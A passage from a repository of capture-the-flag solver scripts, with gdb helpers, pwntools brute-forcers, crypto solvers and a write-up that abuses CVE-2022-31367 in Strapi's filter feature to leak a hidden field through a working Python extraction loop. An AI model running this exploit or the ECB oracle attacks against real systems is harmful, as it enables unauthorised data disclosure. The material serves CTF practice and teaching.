dl = addr2num(gdb.selected_frame().read_register("dl")) 77 | al = addr2num(gdb.selected_frame().read_register("al")) 78 | current_pc = addr2num(gdb.selected_frame().read_register("pc")) 79 | disa = arch.disassemble(current_pc)[0] 80 | var_chk.append(dl) 81 | var_inp.append(al) 82 | gdb.execute("c") 83 | while len(var_chk)!=32: 84 | current_pc = addr2num(gdb.selected_frame().read_register("pc")) 85 | disa = arch.disassemble(current_pc)[0] 86 | if(disa["asm"] == "cmp dl,al"): 87 | dl = addr2num(gdb.selected_frame().read_register("dl")) 88 | al = addr2num(gdb.selected_frame().read_register("al")) 89 | var_chk.append(dl) 90 | var_inp.append(al) 91 | gdb.execute("c") 92 | 93 | f = open("x.txt","w") 94 | f.write(string.printable[:32]) 95 | f.close() 96 | 97 | # find substition index and get buf var 98 | arch = gdb.selected_frame().architecture() 99 | gdb.execute("del") 100 | gdb.execute("b *0x555555555216") # debugging purpose , check edi = 0xffffffff (finding address of our input) 101 | gdb.execute("r < x.txt") 102 | for i in range(526): 103 | gdb.execute("c") 104 | gdb.execute("del") 105 | gdb.execute("rwatch *0x555555559231") # address of our input, processed by the algorithm 106 | for i in range(7): 107 | gdb.execute("c") 108 | al = addr2num(gdb.selected_frame().read_register("al")) 109 | current_pc = addr2num(gdb.selected_frame().read_register("pc")) 110 | disa = arch.disassemble(current_pc)[0] 111 | var_inp.append(al) 112 | gdb.execute("c") 113 | while len(var_chk)!=32: 114 | current_pc = addr2num(gdb.selected_frame().read_register("pc")) 115 | disa = arch.disassemble(current_pc)[0] 116 | if(disa["asm"] == "cmp dl,al"): 117 | al = addr2num(gdb.selected_frame().read_register("al")) 118 | var_inp.append(al) 119 | gdb.execute("c") 120 | tmp = gdb.execute("x/256bx 0x555555559060",to_string=True) 121 | tmp = tmp.split("\n") 122 | for i in tmp[:-1]: 123 | tmp2 = i.split("\t") 124 | for j in tmp2[1:]: 125 | var_buf.append(int(j,16)) 126 | 127 | flag = self.get_flag() 128 | print(flag) 129 | 130 | 131 | def addr2num(addr): 132 | try: 133 | return int(addr) # Python 3 134 | except: 135 | return long(addr) # Python 2 136 | SolverEquation() -------------------------------------------------------------------------------- /solver/2022/litctf/helper_addition.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | static_val=[] 4 | class SolverEquation(gdb.Command): 5 | def __init__ (self): 6 | super (SolverEquation, self).__init__ ("solve-equation",gdb.COMMAND_OBSCURE) 7 | 8 | def invoke (self, arg, from_tty): 9 | global static_val 10 | gdb.execute("b *0x5555555550c5") 11 | for i in range(24): 12 | gdb.execute("set $esi=$edx") 13 | val = addr2num(gdb.selected_frame().read_register("edx")) 14 | gdb.execute("c") 15 | static_val.append(chr(val)) 16 | print("".join(static_val)) 17 | 18 | 19 | # gdb.execute("start") 20 | # arch = gdb.selected_frame().architecture() 21 | # for i in range(40): 22 | # while True: 23 | # # gdb.execute("si") 24 | # try: 25 | # current_pc = addr2num(gdb.selected_frame().read_register("pc")) 26 | # except Exception as e: 27 | # print(static_val) 28 | # # print(current_pc) 29 | # disa = arch.disassemble(current_pc)[0] 30 | # # print(disa["asm"]) 31 | # if('sub al,' in disa["asm"]): 32 | # static_val.append(disa["asm"]) 33 | # elif('BYTE PTR [rip+0x7]' in disa["asm"]): 34 | # gdb.execute("set $al=0") 35 | # print(static_val) 36 | gdb.execute("del") 37 | def addr2num(addr): 38 | try: 39 | return int(addr) # Python 3 40 | except: 41 | return long(addr) # Python 2 42 | SolverEquation() -------------------------------------------------------------------------------- /solver/2022/litctf/solver_min.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import string 3 | 4 | context.log_level='error' 5 | for i in string.printable[:-6]: 6 | # print(i) 7 | r = process("./minimalist") 8 | r.recvuntil("Enter the flag:") 9 | r.send(i*48) 10 | r.recvline() 11 | resp = r.recvline() 12 | if("Wrong" in resp): 13 | r.close() 14 | else: 15 | r.close() 16 | print(i,resp) 17 | break 18 | # r.interactive() -------------------------------------------------------------------------------- /solver/2022/mchctf/SolverMySimpleLogin.java: -------------------------------------------------------------------------------- 1 | class SolverMySimpleLogin{ 2 | public static String x(String s, String k) { 3 | StringBuilder sb = new StringBuilder(); 4 | for (int i = 0; i < s.length(); i++) { 5 | sb.append((char) (s.charAt(i) ^ k.charAt(i % k.length()))); 6 | } 7 | return sb.toString(); 8 | } 9 | public static String r(String s, String c) { 10 | return s.replace(c, ""); 11 | } 12 | public static void main(String[] args) { 13 | String e = ">49s?#kjllw>ijvnra;;i>=kuki`ta;`iirj9::xtm;> 1) | (b << 7)) 7 | plaintext = bytearray(remove_spice(c ^ ord(password[i % len(password)])) for i, c in enumerate(ciphertext)) 8 | print(plaintext) 9 | # with open(file_name + "_decrypted", "wb") as f: 10 | # f.write(plaintext) 11 | 12 | def str_dec(ct,pt): 13 | remove_spice = lambda b: 0xff & ((b >> 1) | (b << 7)) 14 | key = bytearray(remove_spice(c ^ ord(pt[i % len(pt)])) for i, c in enumerate(ct)) 15 | return key 16 | 17 | 18 | f = open("Important_encrypted","rb").read() 19 | flag = "" 20 | for i in range(0,len(f)-8): 21 | key = str_dec(f[i:i+8],"HiDeteXT") 22 | if(all(chr(c) in string.printable for c in key)): 23 | flag += key.decode() 24 | print(flag) 25 | 26 | # password = '\xb6\xd0a\xd2\xeb\xe4\xfbH' 27 | # new_decryption('Important',password) -------------------------------------------------------------------------------- /solver/2022/nitectf/shoo-in/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import gmpy2 3 | from Crypto.Util.number import * 4 | 5 | class RNG: 6 | def __init__ (self, seed, a, b, p): 7 | self.seed = seed 8 | self.a = a 9 | self.b = b 10 | self.p = p 11 | 12 | def gen(self): 13 | out = self.seed 14 | while True: 15 | out = (self.a * out + self.b) % self.p 16 | self.a += 1 17 | self.b += 1 18 | self.p += 1 19 | yield out 20 | 21 | def getPrime (): 22 | prime = int(prime_arr[next(gen)].strip()) 23 | return prime 24 | 25 | def generate_keys(): 26 | p = getPrime() 27 | q = getPrime() 28 | n = p*q 29 | g = n+1 30 | l = (p-1)*(q-1) 31 | mu = gmpy2.invert(((p-1)*(q-1)), n) 32 | return (n, g, l, mu) 33 | 34 | def L(u, n): 35 | return (u - 1) // n 36 | 37 | def pallier_decrypt(key, ct): 38 | n_sqr = key[0]**2 39 | tmp = L(pow(ct, key[2], n_sqr),key[0]) 40 | return (tmp*key[3])%key[0] 41 | 42 | fn = open(r"firstnames.py", 'r') 43 | ln = open(r"lastnames.py", 'r') 44 | fp = open (r"primes.py", 'r') 45 | fn_content = fn.readlines() 46 | ln_content = ln.readlines() 47 | prime_arr = fp.readlines() 48 | N=(min(len(fn_content), len(ln_content))) 49 | print(N) 50 | # r = process(["python3","chal.py"]) 51 | r = remote("34.90.236.228", 1337) 52 | r.recvline() 53 | tmp = r.recvline().strip() 54 | spl = tmp.split(b'\t') 55 | print(spl) 56 | name1 = spl[0].split(b" ") 57 | name2 = spl[2].split(b" ") 58 | a1 = fn_content.index(name1[0].decode()+'\n') 59 | b1 = ln_content.index(name1[1].decode()+'\n') 60 | a2 = fn_content.index(name2[0].decode()+'\n') 61 | b2 = ln_content.index(name2[1].decode()+'\n') 62 | # print(a,b) 63 | for i in range(N+1): 64 | lcg = RNG(i, a1, b1, N) 65 | gen=lcg.gen() 66 | if(next(gen)==a2 and next(gen)==b2): 67 | print("Found!",i) 68 | winner=next(gen)%2 69 | r.recvuntil(b": 1 or 2\n") 70 | r.sendline(str(winner).encode()) 71 | break 72 | for _ in range(9): 73 | next(gen) 74 | next(gen) 75 | next(gen) 76 | next(gen) 77 | winner=next(gen)%2 78 | r.recvuntil(b": 1 or 2\n") 79 | print("huff") 80 | r.sendline(str(winner).encode()) 81 | r.recvuntil(b"message?\n") 82 | ct = r.recvline().strip() 83 | key=generate_keys() 84 | print(ct) 85 | pt = pallier_decrypt(key,int(ct)) 86 | print("pt",long_to_bytes(pt)) 87 | r.interactive() -------------------------------------------------------------------------------- /solver/2022/oscctf/fix_book.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import string 3 | 4 | flag = "" 5 | length = 53 6 | payload = "A"*length 7 | 8 | length_att = 52 9 | payload_att = "A"*length_att 10 | payload_att += 'A", "flag": "' 11 | 12 | context.log_level='error' 13 | 14 | while "}" not in flag: 15 | r = remote("139.59.117.189",4442) 16 | r.recvuntil("namamu?") 17 | block = [] 18 | r.sendline(payload) 19 | r.recvuntil("Anda:") 20 | r.recvline() 21 | enc = r.recvline().strip() 22 | enc = bytes.fromhex(enc.decode()) 23 | for i in range(0,len(enc),16): 24 | block.append(enc[i:i+16]) 25 | r.close() 26 | for i in string.printable[:-6]: 27 | # print(i) 28 | r = remote("139.59.117.189",4442) 29 | r.recvuntil("namamu?") 30 | block_att = [] 31 | r.sendline(payload_att+flag+i) 32 | r.recvuntil("Anda:") 33 | r.recvline() 34 | enc = r.recvline().strip() 35 | enc = bytes.fromhex(enc.decode()) 36 | for j in range(0,len(enc),16): 37 | block_att.append(enc[j:j+16]) 38 | r.close() 39 | if(block_att[4]==block[4]): 40 | flag += i 41 | print("Flag : {}".format(flag)) 42 | payload_att = payload_att[1:] 43 | payload = payload[1:] 44 | break -------------------------------------------------------------------------------- /solver/2022/oscctf/solver_baby.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | 3 | a = "MPG7561y2h[qm0w]u7wZ60p{]v[w6[q3ekpqqy" 4 | 5 | key = 0x203040505040302 6 | key = long_to_bytes(key) 7 | flag = "" 8 | for i in range(len(a)): 9 | flag += chr(ord(a[i])^key[i%len(key)]) 10 | print(flag) -------------------------------------------------------------------------------- /solver/2022/oscctf/solver_flip.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import string 3 | 4 | r = remote("139.59.117.189",4441) 5 | length = 32 6 | flag = b"" 7 | while b"}" not in flag: 8 | while True: 9 | r.recvuntil("encrypt? ") 10 | payload = hex(ord('A'))[2:]*(length-1) 11 | r.sendline(payload) 12 | check = r.recvuntil(" = ") 13 | if(b"!" not in check): 14 | block = [] 15 | resp = r.recvline().strip() 16 | resp = bytes.fromhex(resp.decode()) 17 | for i in range(0,len(resp),16): 18 | block.append(resp[i:i+16]) 19 | break 20 | for i in string.printable[:-6]: 21 | # print(i) 22 | block_check = [] 23 | while True: 24 | r.recvuntil("encrypt? ") 25 | tmp_payload = payload + flag.hex() + hex(ord(i))[2:] 26 | r.sendline(tmp_payload) 27 | check = r.recvuntil(" = ") 28 | if b"!" not in check: 29 | resp = r.recvline().strip() 30 | resp = bytes.fromhex(resp.decode()) 31 | for j in range(0,len(resp),16): 32 | block_check.append(resp[j:j+16]) 33 | break 34 | if(block[1]==block_check[1]): 35 | flag += i.encode() 36 | print("Flag : {}".format(flag)) 37 | length -= 1 38 | break -------------------------------------------------------------------------------- /solver/2022/oscctf/solver_shamir.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | 3 | n = 14271578418243991182948053790020939604709913291240698269722057521898121666257201008378155951082215094743985416112814155416041637109048209896498049350850398863230921222625695245595648478712468316028827291570002981943598195360594449192095310767925103828018503658506789429532794282804715424285580728595876813137257367967214214187712005954474808189735398872202288587176457554475557547935956191021081222387113719102264032090294484281147553053650496094646634072222703650863210301277293405637971348347271180618913368939005306155047399923688312134829227011262152812278285408086835138886519140271337574648445256272539866945829 4 | c = 7122175960852496938475393339139207199088670246253603618307801787286894108828782105596039197147169650719301776107664229881034338822166454707727326561182204630625153673881465984372829614190797411662714153592210095613132089565075110026594781421785171659101583969664621807242453750331798043357485010977272403583369552781164422513721643016757410051923946703417694390707321503534366693343134050177450499566649510997468997768983671699194417651249278316132917308374923522476942815196034928371196099780886463076498847229545961662332931942581031454817423688325698364342987746470512053086887501044086549338805486558431128736066 5 | kphi = 62835455821362858004517774398316888530647913562616956289318938795810695946114686391275144069834668015444902501631122488285448487888377835599404350150197272927683792670201720609508857623639506147030009150212950278770326313652277965129502628808901929003920094282974241222143147998971905502996055161264134344207199700769472486805803536134414274484629896308756749764159247099887628072711931757517360938478167529596745710365075700924571611085399756537841907692858069984319936297798206794309497405564832050518315866418185301146419880668003285249207576065806438675563011065708510182559803540975739216355263152797670111445668145515195530756160 6 | e = 65537 7 | kd = pow(e,-1,kphi) 8 | print(long_to_bytes(pow(c,kd,n))) -------------------------------------------------------------------------------- /solver/2022/tedctf/Pasted image 20221110122039.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2022/tedctf/Pasted image 20221110122039.png -------------------------------------------------------------------------------- /solver/2022/tedctf/Pasted image 20221110122327.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2022/tedctf/Pasted image 20221110122327.png -------------------------------------------------------------------------------- /solver/2022/tedctf/Pasted image 20221110123525.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2022/tedctf/Pasted image 20221110123525.png -------------------------------------------------------------------------------- /solver/2022/tedctf/Pasted image 20221110123727.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2022/tedctf/Pasted image 20221110123727.png -------------------------------------------------------------------------------- /solver/2022/tedctf/you_cant_see_me.md: -------------------------------------------------------------------------------- 1 | # You Can't See Me - TED CTF 2022 2 | 3 | Given access to Strapi dashboard 4 | 5 | 6 | ![img](https://raw.githubusercontent.com/kos0ng/ctf-writeups/master/solver/2022/tedctf/Pasted%20image%2020221110122039.png) 7 | 8 | 9 | We try to check each data on dashboard and there is "User" tab in dashoard. Take a look on one of the user we can see that there is suspicous column which is "Flag" 10 | 11 | ![img](https://raw.githubusercontent.com/kos0ng/ctf-writeups/master/solver/2022/tedctf/Pasted%20image%2020221110122327.png) 12 | 13 | Flag is hidden, given user can't view the hidden data. By using [CVE-2022-31367](https://github.com/kos0ng/CVEs/tree/main/CVE-2022-31367) unauthorized user can abuse the filter feature to get the value of the Flag. Here is the solver to get the flag. 14 | ```python 15 | import requests 16 | import json 17 | import string 18 | import urllib.parse 19 | 20 | r = requests.session() 21 | url = "http://103.250.10.221:8000/content-manager/collection-types/plugins::users-permissions.user?page=1&pageSize=10&_sort=username:ASC&_where[0][flag_containss]={}" 22 | auth = {"Authorization":"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MiwiaWF0IjoxNjY4MDU4MzIyLCJleHAiOjE2NzA2NTAzMjJ9.3z8fxPaec8wj_vCDHAWJztPbpXKMfx-4DPTQPxkngjU"} 23 | leak_flag = "" 24 | poss_char = string.printable[:-6].replace("%","") 25 | while True: 26 | print("Leak : " + leak_flag) 27 | known_len = len(leak_flag) 28 | for i in poss_char: 29 | safe_string = urllib.parse.quote_plus(leak_flag+i) 30 | tmp_url = url.format(safe_string) 31 | data = json.loads(r.get(tmp_url,headers = auth).text) 32 | if(len(data['results']) > 0 ): 33 | leak_flag += i 34 | break 35 | if(known_len==len(leak_flag)): 36 | break 37 | while True: 38 | print("Leak : " + leak_flag) 39 | known_len = len(leak_flag) 40 | for i in poss_char: 41 | safe_string = urllib.parse.quote_plus(i+leak_flag) 42 | tmp_url = url.format(safe_string) 43 | data = json.loads(r.get(tmp_url,headers = auth).text) 44 | if(len(data['results']) > 0 ): 45 | email = data['results'][0]['email'] 46 | leak_flag = i + leak_flag 47 | break 48 | if(known_len==len(leak_flag)): 49 | break 50 | print("Email : " + email) 51 | print("Flag : " + leak_flag) 52 | ``` 53 | 54 | ![img](https://raw.githubusercontent.com/kos0ng/ctf-writeups/master/solver/2022/tedctf/Pasted%20image%2020221110123525.png) 55 | ![img](https://raw.githubusercontent.com/kos0ng/ctf-writeups/master/solver/2022/tedctf/Pasted%20image%2020221110123727.png) 56 | 57 | After that just change the format to flag format and got the flag 58 | 59 | **Flag : CTFTED2022{cve-2022-31367-should_be_easy_for_you}** 60 | -------------------------------------------------------------------------------- /solver/2022/uactf/solver_wat.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | 3 | target = [0x78,0x41,0x44,0x54,0x6b,0x07,0x65,0x31,0x49,0xbe,0x7a,0x30,0x58,0xbe,0x36,0x33,0x86,0xbd,0x6e,0x79,0x13,0x6e,0x31,0x37,0x13,0x78,0x33,0x07] 4 | 5 | inp = 'AAAABBBBCCCCDDDDEEEEFFFFGGGG' 6 | length = len(inp) 7 | pcStack4 = [ord(i) for i in inp] 8 | 9 | # def unhackable(param1, param2, param3): 10 | # tmp = 0 11 | # print("Z",hex(param1)) 12 | # for uStack20 in range(0x20): 13 | # print((param1 & 1 << (uStack20 & 0x1f))) 14 | # if((((param1 & (1 << (uStack20 & 0x1f))) >> (uStack20 & 0x1f)) + ((param2 & (1 << (uStack20 & 0x1f))) >> (uStack20 & 0x1f))) % param3 != 0): 15 | # tmp = tmp | (1 << (uStack20 & 0x1f)) 16 | # print("R",hex(tmp)) 17 | # return tmp 18 | 19 | # for i in range(length): 20 | # if(pcStack4[i]==ord('_')): 21 | # pcStack4[i] = chr(pcStack4[i]<<1) 22 | # if(ord('z') < pcStack4[i]): 23 | # pcStack4[i] = pcStack4[i] >> 4 24 | 25 | # for i in range(0,length,2): 26 | # pcStack4[i] = pcStack4[i] - 3 27 | 28 | # for i in range(length-2,-1,-2): 29 | # pcStack4[i] = pcStack4[i] + 0x04 30 | # res = [] 31 | 32 | # for i in range(length//4): 33 | # z = ''.join(map(chr,pcStack4[i:i+4])) 34 | # z = bytes_to_long(z.encode()[::-1]) 35 | # tmp = unhackable(z-0x45,0x69,2) 36 | # # pcStack4[i*4] = tmp 37 | # res.append(tmp) 38 | 39 | # print(res) 40 | 41 | length = len(target) 42 | for i in range(len(target)//4): 43 | target[i*4] = (target[i*4]^0x69)+0x45 44 | for i in range(0,length,2): 45 | target[i] = target[i] - 4 46 | for i in range(length-2,-1,-2): 47 | target[i] = target[i] + 3 48 | for i in range(length): 49 | if(target[i]>>1==ord('_')): 50 | print(i,'_') 51 | else: 52 | print(i,target[i],chr(target[i]<<4),chr(target[i]&0xff)) 53 | 54 | # UACTF{d1d_y0u_533_my_n07_x2} -------------------------------------------------------------------------------- /solver/2023/bi0sctf/bluelock/solver.py: -------------------------------------------------------------------------------- 1 | import xxtea 2 | 3 | a = "47 B5 17 85 79 AF E1 AA 57 24 EC 7A 3C 9A AF C1 A0 B7 2D C0 29 51 C4 0B 5B 9C A1 79 60 82 00 D4 B1 ED D5 4A".split(" ") 4 | b = [int(i,16) for i in a] 5 | 6 | key = bytes.fromhex("b09b7800abababababababababababab") 7 | dec = xxtea.decrypt(bytes(b), key, padding=False) 8 | print(dec) -------------------------------------------------------------------------------- /solver/2023/bi0sctf/eeriejit/solver.sage: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | import string 3 | 4 | p = 2130660241 5 | PR. = PolynomialRing(GF(2130660241)) 6 | b = 885790857*1311175533 - (1311175533*a*a*2) - (a*17*1311175533) 7 | # print(b) 8 | f = 6*b + 105*a + 5*a*b - 4*a**2 - 519498219 9 | # print(f) 10 | _ = f.roots() 11 | flag = [0 for i in range(4)] 12 | for x1, z in _: 13 | x2 = int(1311175533 * (885790857 - 2*x1**2 - 17*x1) % p) 14 | x3 = int(inverse_mod(105 - 5*x2, p) * (1759856675 - 5*x2*x2) % p) 15 | x4 = int(inverse_mod(303 - 4*x3, p) * (287468906 - 5*x3*x3) % p) 16 | tmp = [int(x1), x2, x3, x4] 17 | for i in range(len(tmp)): 18 | try: 19 | tmp2 = long_to_bytes(tmp[i]).decode() 20 | if(all(c in string.printable for c in tmp2)): 21 | flag[i] = tmp2 22 | except Exception as e: 23 | continue 24 | print(''.join(flag)) -------------------------------------------------------------------------------- /solver/2023/bi0sctf/lowkeyenc/solver.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | from PIL import Image 3 | 4 | key = [0x52, 0xfd, 0xfc, 0x7, 0x21, 0x82, 0x65, 0x4f, 0x16, 0x3f, 0x5f, 0xf, 0x9a, 0x62, 0x1d, 0x72, 0x95, 0x66, 0xc7, 0x4d, 0x10, 0x3, 0x7c, 0x4d, 0x7b, 0xbb, 0x4, 0x7, 0xd1, 0xe2, 0xc6, 0x49] 5 | iv = [0x81, 0x85, 0x5a, 0xd8, 0x68, 0x1d, 0xd, 0x86, 0xd1, 0xe9, 0x1e, 0x0, 0x16, 0x79, 0x39, 0xcb] 6 | 7 | cipher = AES.new(bytes(key), AES.MODE_CBC, bytes(iv)) 8 | cipher2 = AES.new(bytes(key), AES.MODE_CBC, bytes(iv)) 9 | 10 | im = Image.open('target.png', 'r') 11 | width, height = im.size 12 | pixel_values = list(im.getdata()) 13 | ct = [] 14 | for i in pixel_values: 15 | if(i!=(0, 0, 0, 0)): 16 | ct.append(i[0]) 17 | ct2 = [] 18 | for i in range(len(ct)): 19 | ct2.append(i^ct[i]) 20 | 21 | print(cipher.decrypt(cipher2.decrypt(bytes(ct2)))) 22 | # bi0sCTF{Th3_fl4gs_l0wk3y_3ncryp7i0n_b3li3s_i7s_f0rmid4bl3_c1ph3r} -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220124225.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220124225.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220124227.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220124227.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220124348.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220124348.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220124434.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220124434.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220124440.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220124440.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220124710.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220124710.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220125116.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220125116.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220125120.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220125120.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220125222.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220125222.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220125302.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220125302.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220125310.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220125310.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/images/Pasted image 20230220130944.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/images/Pasted image 20230220130944.png -------------------------------------------------------------------------------- /solver/2023/hacktm/re/free-play/main.wasm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/hacktm/re/free-play/main.wasm -------------------------------------------------------------------------------- /solver/2023/irisctf/crypto/aesbad256/helper.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | # inp = input("CT : ") 4 | # inp = "0e294864d68c0f19496814e0dad279e8726fd543291105a94f61ac9176f0969c73f57abe8efb21ee697c98b809758476ea91e3535ec1927f92693689b8a8da45374973623386b071443787f82330276c80adacab834c2a6335e89dc4b828a9f453284748efc667d7284690127338de19e411924c46c19b9ed95d1a3e849e55a2d02e9e5a0b9978762c525e18da96f124e192e023d4268ff7246a3b69193bb5267e78b01b3725a93d6940a1893bd35388a496c34b648a7c9b5299153acce1a4e543067b053bf7e5d6d60f39a0d58e16bd346ed7f81d59412f2bc46ad0b8d099233cba24a7dcd067c278b6ecea84a30802c1b7571fa4c196c451774cae744f1ae7" 5 | inp = "0d6963aa0990c5010499a911f825e71c986a8f5affd6136e8d824f12761f16a43e0a2fc805e0495330df65faaad3189ce00880927e7c2175fa293c71bf50b910fb7fa4c6d4e5aafb0ba422d91fe0b3663d5a44b70cd222d971fe3dfc89cd87665210248815d51138d3b1ca5d757dcad9df3ece99b35bca8e4a6c7dca19b572fe7f3ff069d73291de4bf2f33ca8a9e598c781e4edabb0caf9f92abfc1d414b6d71483272623a421713061d8ddc445278faf0e12b03a5f8f34a4648f51d0ce6132522d46284b395a74355613820241a3a76e519661358633daeddfdea7c620707f4a7b91ee4336ba7f3be0e4449ab55302af1922f0ddb25722926dd375f73266ab" 6 | ct = bytes.fromhex(inp) 7 | block = [] 8 | for i in range(0,len(ct),16): 9 | block.append(ct[i:i+16]) 10 | inp2 = "01a46f5f9dc0a1c965814c480aa2201a720d602eb4d833b9e7dfb2d370e59a9ee5ae6e394ac882aa32cbbcfad3489823a46c12a857488096642268fa6a0b77bfe87141c8855889cb521c27dc4828c7a384b06c355ac85352b4584305f400ce8de9ef692493142376ce7388493a5414f88bad9b4c464b6e879a459d44746fcef658a8eea46e57c948656bc8870604a9357b11cf3acb01048b5b58fd0e4ea8630c0b9a46c7fa28b95db69b0fab5dc60b5c06f1a2e1d6507e1fbbe197978a0abc2635fbd4b5cae5cb76d81b6ee12999ba48ba20e1bdc0ccb32601af38d5da6fb83a32eb33a6903ff2e16857dcb7d89da7935d9af98d0ec8a4b23e86e4ce06e61e70" 11 | ct2 = bytes.fromhex(inp2) 12 | block2 = [] 13 | for i in range(0,len(ct2),16): 14 | block2.append(ct2[i:i+16]) 15 | inp3 = "8ed65066701649f49cc1302913c04ab73f34839eaa77fcd13bb359b0fe82b5485b705bba1513fcc5420f3dd6a58737cf07c70a4fa64d1ff676a7129c9c97b8b6a0cd513f75c0d9198f5762fe67a0183f38f47e3d3c08a9dd97db504376c7c254d556e10d93fffc8126979449935bbab132ca271854cd86f5a28843f829ea2a2f93e9c304d3e82e4d2a814822ea3d7575718e8391d364e9dcb0ffb93a6978f8f473dd4f0b187d928b51ec79f89b6922438e3ac436c8db731bd7db803ed73c6853b88bb097c226c48044492876c01679a8482fcf72c6c18c0a8d0962c5dbcf19b8b28609eb4d45b003c96d024958d7fd024c8e97f255f580401f29757c98dec3a5" 16 | ct3 = bytes.fromhex(inp3) 17 | block3 = [] 18 | for i in range(0,len(ct3),16): 19 | block3.append(ct3[i:i+16]) 20 | payload = block[0] # 0 21 | payload += block[1] # 1 22 | payload += block[2] # 2 23 | payload += block[2] # 3 24 | payload += block[4] # 4 25 | payload += block[5] # 5 26 | payload += block[3] # 6 27 | payload += block[7] # 7 28 | payload += block[8] # 8 29 | payload += block[15] # 9 30 | payload += block[10] # 10 31 | payload += block3[11] # 11 32 | payload += block[12] # 12 33 | payload += block[13] # 13 34 | payload += block[14] # 14 35 | payload += block2[15] # 15 36 | print(payload.hex()) -------------------------------------------------------------------------------- /solver/2023/irisctf/crypto/babymixup/solver.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | 3 | IV1 = bytes.fromhex("4ee04f8303c0146d82e0bbe376f44e10") 4 | CT1 = bytes.fromhex("de49b7bb8e3c5e9ed51905b6de326b39b102c7a6f0e09e92fe398c75d032b41189b11f873c6cd8cdb65a276f2e48761f6372df0a109fd29842a999f4cc4be164") 5 | IV2 = bytes.fromhex("1fe31329e7c15feadbf0e43a0ee2f163") 6 | CT2 = bytes.fromhex("f6816a603cefb0a0fd8a23a804b921bf489116fcc11d650c6ffb3fc0aae9393409c8f4f24c3d4b72ccea787e84de7dd0") 7 | 8 | knwon_pt = b"Hello, this is a public message. This message contains no flags." 9 | fake_iv = b"\x00"*16 10 | cipher = AES.new(IV1, AES.MODE_CBC, fake_iv) 11 